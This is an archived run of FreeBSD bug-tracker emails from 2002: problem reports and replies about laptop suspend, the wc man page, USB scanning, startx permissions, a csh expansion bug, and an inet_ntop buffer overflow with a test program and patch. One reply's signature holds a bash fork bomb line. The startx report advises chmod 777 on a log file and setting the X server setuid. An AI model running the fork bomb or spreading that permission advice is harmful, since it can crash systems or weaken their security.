Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g731TfM3052154; Fri, 2 Aug 2002 18:29:41 -0700 (PDT) Date: Fri, 2 Aug 2002 18:29:41 -0700 (PDT) From: Johan Karlsson Message-Id: <200208030129.g731TfM3052154@freefall.freebsd.org> To: steve@stevenwills.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Suspend doesn't work on Dell Latitude CPx laptop State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Fri Aug 2 18:27:29 PDT 2002 State-Changed-Why: Suspend is working with 4.6-Stable on my Dell Latitiude CPx. Moreover, originator does not have the hardware anymore and is therefore unable to do more tests. http://www.freebsd.org/cgi/query-pr.cgi?pr=34033 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 18:47:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8E9E037B400; Fri, 2 Aug 2002 18:47:27 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 441A443E4A; Fri, 2 Aug 2002 18:47:27 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g731lRJU053960; Fri, 2 Aug 2002 18:47:27 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g731lRo1053956; Fri, 2 Aug 2002 18:47:27 -0700 (PDT) Date: Fri, 2 Aug 2002 18:47:27 -0700 (PDT) From: Johan Karlsson Message-Id: <200208030147.g731lRo1053956@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: misc/40197: BurnCD doesn't "just work" at 4.6-p1 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: BurnCD doesn't "just work" at 4.6-p1 Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Fri Aug 2 18:47:01 PDT 2002 Responsible-Changed-Why: Over to burncd author/maintainer http://www.freebsd.org/cgi/query-pr.cgi?pr=40197 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 0:50: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8EF1137B400 for ; Sat, 3 Aug 2002 00:50:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF56743E65 for ; Sat, 3 Aug 2002 00:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g737o1JU009824 for ; Sat, 3 Aug 2002 00:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g737o1U1009823; Sat, 3 Aug 2002 00:50:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 56E0437B400 for ; Sat, 3 Aug 2002 00:47:16 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1CF1143E3B for ; Sat, 3 Aug 2002 00:47:16 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g737lFOT034346 for ; Sat, 3 Aug 2002 00:47:15 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g737lFag034345; Sat, 3 Aug 2002 00:47:15 -0700 (PDT) Message-Id: <200208030747.g737lFag034345@www.freebsd.org> Date: Sat, 3 Aug 2002 00:47:15 -0700 (PDT) From: Michael Heitmeier To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41278: incorrect wc documentation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41278 >Category: misc >Synopsis: incorrect wc documentation >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 00:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Michael Heitmeier >Release: 4.6 >Organization: just me >Environment: 4.6-release >Description: man wc incorrectly states that the output of wc is equivalent to the options -clw, when in fact the output of wc is the same as wc -lwc >How-To-Repeat: read man wc and memorize the sequence of the options shown there, then run wc on a small text file with a known number of lines and compare the output against the sequence as given in man. >Fix: Change man wc to list the sequence -lwc in the synopsis and the description. I would suggest that the sequence lines, words, bytes (lwc) is anyway the most intuitive as the resulting numbers increase from left to right for all but the smallest files, making it easy to know what one is looking at. It is therefore suggested to change the man page, rather than the code. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 5: 0:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DA3537B400 for ; Sat, 3 Aug 2002 05:00:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E442943E65 for ; Sat, 3 Aug 2002 05:00:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73C05JU051957 for ; Sat, 3 Aug 2002 05:00:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73C058Y051956; Sat, 3 Aug 2002 05:00:05 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9E4F937B400 for ; Sat, 3 Aug 2002 04:59:55 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 62CB643E6E for ; Sat, 3 Aug 2002 04:59:55 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g73BxsOT060538 for ; Sat, 3 Aug 2002 04:59:54 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g73Bxsli060537; Sat, 3 Aug 2002 04:59:54 -0700 (PDT) Message-Id: <200208031159.g73Bxsli060537@www.freebsd.org> Date: Sat, 3 Aug 2002 04:59:54 -0700 (PDT) From: Henning Meier-Geinitz To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41281: USB scanning works only once Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41281 >Category: kern >Synopsis: USB scanning works only once >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 05:00:05 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Henning Meier-Geinitz >Release: 4.6 >Organization: >Environment: FreeBSD hmg1.meier-geinitz.de 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun 11 06:14:12 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC >Description: I'm trying to scan with my Mustek USB scanner (1200 UB) using SANE. Scanning works exactly once. After that successful scan I have to reboot to scan again because the scan program (e.g. scanimage) just freezes the second time it's started. This is not specific for the scanner, Mustek 1200 CU and 600 CU show the same behaviour. It also doesn't matter if SANE uses the uscanner driver or ugen (via libusb). The same happens on OpenBSD and NetBSD. Linux works without problems. I'm using an ohci host controller, but a quick test with NetBSD on an uhci host showed the same behaviour. >How-To-Repeat: More details, logs and a short test program can be found in my messages to the usb-bsd mailing list: http://groups.yahoo.com/group/usb-bsd/message/1549 http://groups.yahoo.com/group/usb-bsd/message/1550 http://groups.yahoo.com/group/usb-bsd/message/1553 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 9:10:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9589E37B401 for ; Sat, 3 Aug 2002 09:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9F3A943E4A for ; Sat, 3 Aug 2002 09:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73GA2JU005771 for ; Sat, 3 Aug 2002 09:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73GA2Jw005770; Sat, 3 Aug 2002 09:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8FF7D37B408 for ; Sat, 3 Aug 2002 09:03:32 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 402B143E42 for ; Sat, 3 Aug 2002 09:03:32 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g73G3WOT089563 for ; Sat, 3 Aug 2002 09:03:32 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g73G3Wa9089562; Sat, 3 Aug 2002 09:03:32 -0700 (PDT) Message-Id: <200208031603.g73G3Wa9089562@www.freebsd.org> Date: Sat, 3 Aug 2002 09:03:32 -0700 (PDT) From: ethan To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41285: xauth:(argv):1: bad display name ":0" in "add" command Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41285 >Category: misc >Synopsis: xauth:(argv):1: bad display name ":0" in "add" command >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 09:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: ethan >Release: 4.6 >Organization: none >Environment: xauth:(argv):1: bad display name ":0" in "add" command >Description: when i log on as root i get this error when i type in startx xauth:(argv):1: bad display name ":0" in "add" command >How-To-Repeat: when i log on as root i get this error when i type in startx and it will also freeze up. xauth:(argv):1: bad display name ":0" in "add" command >Fix: i don't know can you help me >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 10: 0:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 38CFC37B400 for ; Sat, 3 Aug 2002 10:00:13 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id EC2AE43E70 for ; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73H0BJU010076 for ; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73H0B4r010075; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1FAC37B400 for ; Sat, 3 Aug 2002 09:57:54 -0700 (PDT) Received: from fafoe.dyndns.org (chello212186121237.14.vie.surfer.at [212.186.121.237]) by mx1.FreeBSD.org (Postfix) with ESMTP id 586C343E3B for ; Sat, 3 Aug 2002 09:57:54 -0700 (PDT) (envelope-from stefan@fafoe.dyndns.org) Received: by frog.fafoe (Postfix, from userid 1001) id 0FE86281; Sat, 3 Aug 2002 19:02:55 +0200 (CEST) Message-Id: <20020803170255.0FE86281@frog.fafoe> Date: Sat, 3 Aug 2002 19:02:55 +0200 (CEST) From: Stefan Farfeleder Reply-To: Stefan Farfeleder To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/41289: inet_ntop(3) buffer overflow Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41289 >Category: misc >Synopsis: inet_ntop(3) buffer overflow >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 10:00:11 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Stefan Farfeleder >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD frog.fafoe 4.6-STABLE FreeBSD 4.6-STABLE #0: Fri Aug 2 01:04:34 CEST 2002 freebsd@frog.fafoe:/freebsd/stable/obj/freebsd/stable/src/sys/FROG i386 >Description: inet_ntop4()'s check for ENOSPC is wrong. sprintf() doesn't include the terminating '\0' in its return value. inet_ntop6() seems safe. >How-To-Repeat: Script started on Sat Aug 3 18:57:36 2002 stefan@frog:~ 501 (0)$ cat pr.c #include #include #include #include #include int main(void) { char buf[8]; u_int32_t i = inet_addr("1.2.3.4"); buf[7] = 1; inet_ntop(AF_INET, &i, buf, 7); if (buf[7] != 1) printf("buf[7] overwritten!\n"); return 0; } stefan@frog:~ 502 (0)$ c89 pr.c stefan@frog:~ 503 (0)$ ./a.out buf[7] overwritten! stefan@frog:~ 504 (0)$ exit Script done on Sat Aug 3 18:57:52 2002 >Fix: --- inet_ntop.c.orig Sat Aug 3 18:14:52 2002 +++ inet_ntop.c Sat Aug 3 18:41:33 2002 @@ -85,7 +85,7 @@ static const char fmt[] = "%u.%u.%u.%u"; char tmp[sizeof "255.255.255.255"]; - if (SPRINTF((tmp, fmt, src[0], src[1], src[2], src[3])) > size) { + if (SPRINTF((tmp, fmt, src[0], src[1], src[2], src[3])) >= size) { errno = ENOSPC; return (NULL); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 10: 0:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5B61137B401 for ; Sat, 3 Aug 2002 10:00:13 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9441543E65 for ; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73H0BJU010061 for ; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73H0B0q010060; Sat, 3 Aug 2002 10:00:11 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6FE0C37B400 for ; Sat, 3 Aug 2002 09:50:21 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3397C43E5E for ; Sat, 3 Aug 2002 09:50:21 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g73GoJOT092601 for ; Sat, 3 Aug 2002 09:50:19 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g73GoJZi092600; Sat, 3 Aug 2002 09:50:19 -0700 (PDT) Message-Id: <200208031650.g73GoJZi092600@www.freebsd.org> Date: Sat, 3 Aug 2002 09:50:19 -0700 (PDT) From: Buenaventura Carreras To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41288: startx works for root but not for users Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41288 >Category: misc >Synopsis: startx works for root but not for users >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 10:00:11 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Buenaventura Carreras >Release: 4.6 >Organization: University of Granada >Environment: >Description: After installing freeBSD I could start XWindow only as root. When I tried startx as user I got the following message "Fatal server error: cannot open log file "/var/log/XFree86.0.log". I changed permissions of "var/log/XFree86.0.log" to 777. Then I got among other messages something like "set suid the server". After several trials (I did not know exactly which file was the server) I found and set suid "/usr/X11R6/bin/XFree86". Since then I can start XWindow as a user. >How-To-Repeat: >Fix: Could you not provide "/usr/X11R6/bin/XFree86" already set suid with the distribution of FreeBSD 4.6 ?. For the people like me who are new to FreeBSD that could save a lot of time or even be decisive to use FreeBSD. I got my version of FreeBSD through the net as an ISO-IMAGE-i386 at ftp://ftp.es.FreeBSD.org/pub/FreeBSD. Perhaps you can post this report at some place where other people with the same (silly, I recognize) problem can see the easy solution: as root execute "chmod u+s /usr/X11R6/bin/XFree86", or in KDE use Konkeror to change the permissions in the properties of the file. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 10: 2:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E6CD37B401; Sat, 3 Aug 2002 10:02:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3332F43E4A; Sat, 3 Aug 2002 10:02:10 -0700 (PDT) (envelope-from luigi@FreeBSD.org) Received: from freefall.freebsd.org (luigi@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73H2AJU010453; Sat, 3 Aug 2002 10:02:10 -0700 (PDT) (envelope-from luigi@freefall.freebsd.org) Received: (from luigi@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73H29kP010449; Sat, 3 Aug 2002 10:02:09 -0700 (PDT) Date: Sat, 3 Aug 2002 10:02:09 -0700 (PDT) From: Luigi Rizzo Message-Id: <200208031702.g73H29kP010449@freefall.freebsd.org> To: romanp@unshadow.net, luigi@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/41114: ipfw2 + dummynet + bridge = kernel panic Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ipfw2 + dummynet + bridge = kernel panic State-Changed-From-To: open->closed State-Changed-By: luigi State-Changed-When: Sat Aug 3 10:01:39 PDT 2002 State-Changed-Why: fixed in a recent commit to ip_dummynet.c, thanks http://www.freebsd.org/cgi/query-pr.cgi?pr=41114 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 15:20:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 71B3537B400 for ; Sat, 3 Aug 2002 15:20:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C7F0043E65 for ; Sat, 3 Aug 2002 15:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73MK1JU064807 for ; Sat, 3 Aug 2002 15:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73MK1o7064806; Sat, 3 Aug 2002 15:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9220137B400 for ; Sat, 3 Aug 2002 15:17:42 -0700 (PDT) Received: from mail.eecs.harvard.edu (bowser.eecs.harvard.edu [140.247.60.24]) by mx1.FreeBSD.org (Postfix) with ESMTP id 327E043E4A for ; Sat, 3 Aug 2002 15:17:42 -0700 (PDT) (envelope-from dholland@eecs.harvard.edu) Received: by mail.eecs.harvard.edu (Postfix, from userid 32170) id 5A84F54C659; Sat, 3 Aug 2002 18:17:41 -0400 (EDT) Message-Id: <20020803221741.5A84F54C659@mail.eecs.harvard.edu> Date: Sat, 3 Aug 2002 18:17:41 -0400 (EDT) From: "David A.Holland" Reply-To: "David A.Holland" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41297: {t,}csh backquote/braces expansion bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41297 >Category: bin >Synopsis: {t,}csh backquote/braces expansion bug >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 03 15:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: David A. Holland >Release: FreeBSD 4.5-RELEASE i386 >Organization: Harvard EESC >Environment: System: FreeBSD bowser.eecs.harvard.edu 4.5-RELEASE FreeBSD 4.5-RELEASE #1: Tue Jun 25 16:51:02 EDT 2002 palmer@bowser.eecs.harvard.edu:/usr/src/sys/compile/BOWSER i386 tcsh 6.11.00 was built from ports. >Description: If you write a program "foo" that prints echo '{' and then type echo `foo` tcsh incorrectly prints "Missing }." Similarly, if you have foo print echo '{a,b,c}' tcsh prints "echo 'a' 'b' 'c'". Observed with: tcsh 6.09 for i386-intel-NetBSD tcsh 6.10 for i386-intel-linux tcsh 6.11 for i386-intel-FreeBSD and also csh from FreeBSD 4.5-RELEASE csh from NetBSD 1.6-current What happens is that globexpand() in sh.glob.c is called to handle the backquotes, which is correct; however, after expanding the backquotes, globexpand proceeds to also expand braces, tilde, and some other things. None of these expansions check for or honor quotes (either single or double quotes) and this produces the problem. I don't claim to know enough about the inner workings of expansions in csh to suggest a correct fix. Probably the results of backquote expansion need to be rescanned for quotes earlier than they are. (They apparently are at some point, although I haven't found the code yet.) This problem gets tickled when using the X11 "resize" command in connection with a termcap entry that contains braces, as some do, but is more or less silent as long as the braces match, which generally in the past they have. (However, FreeBSD seems to have recently introduced an xterm termcap entry where the braces don't match. This broke my login and caused me to investigate.) The problem also affects FreeBSD and NetBSD's /bin/csh and, in fact, probably every csh. Therefore, copies of this message are being sent to various additional appropriate places. >How-To-Repeat: See above. >Fix: As a workaround to the immediate problem, the status quo can be restored by restoring the matching braces to the termcap file. Also see above. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 16:40: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 581AD37B400 for ; Sat, 3 Aug 2002 16:40:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1727543E4A for ; Sat, 3 Aug 2002 16:40:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73Ne4JU075543 for ; Sat, 3 Aug 2002 16:40:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73Ne4Kx075542; Sat, 3 Aug 2002 16:40:04 -0700 (PDT) Date: Sat, 3 Aug 2002 16:40:04 -0700 (PDT) Message-Id: <200208032340.g73Ne4Kx075542@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Edwin Groothuis Subject: Re: misc/41288: startx works for root but not for users Reply-To: Edwin Groothuis Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41288; it has been noted by GNATS. From: Edwin Groothuis To: Buenaventura Carreras Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: misc/41288: startx works for root but not for users Date: Sun, 4 Aug 2002 09:36:18 +1000 On Sat, Aug 03, 2002 at 09:50:19AM -0700, Buenaventura Carreras wrote: > > >Number: 41288 > >Category: misc > >Synopsis: startx works for root but not for users > >Confidential: no > >Severity: non-critical > >Priority: low > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: change-request > >Submitter-Id: current-users > >Arrival-Date: Sat Aug 03 10:00:11 PDT 2002 > >Closed-Date: > >Last-Modified: > >Originator: Buenaventura Carreras > >Release: 4.6 > >Organization: > University of Granada > >Environment: > >Description: > After installing freeBSD I could start XWindow only as root. When I tried startx as user I got the following message "Fatal server error: cannot open log file "/var/log/XFree86.0.log". > I changed permissions of "var/log/XFree86.0.log" to 777. Then I got among other messages something like "set suid the server". After several trials (I did not know exactly which file was the server) I found and set suid "/usr/X11R6/bin/XFree86". Since then I can start XWindow as a user. Try installing /usr/ports/x11/wrapper, it works better than doing the chmod. Also try -questions next time. Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 3 19:44:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6AFF137B400; Sat, 3 Aug 2002 19:44:15 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1DA6243E5E; Sat, 3 Aug 2002 19:44:15 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: 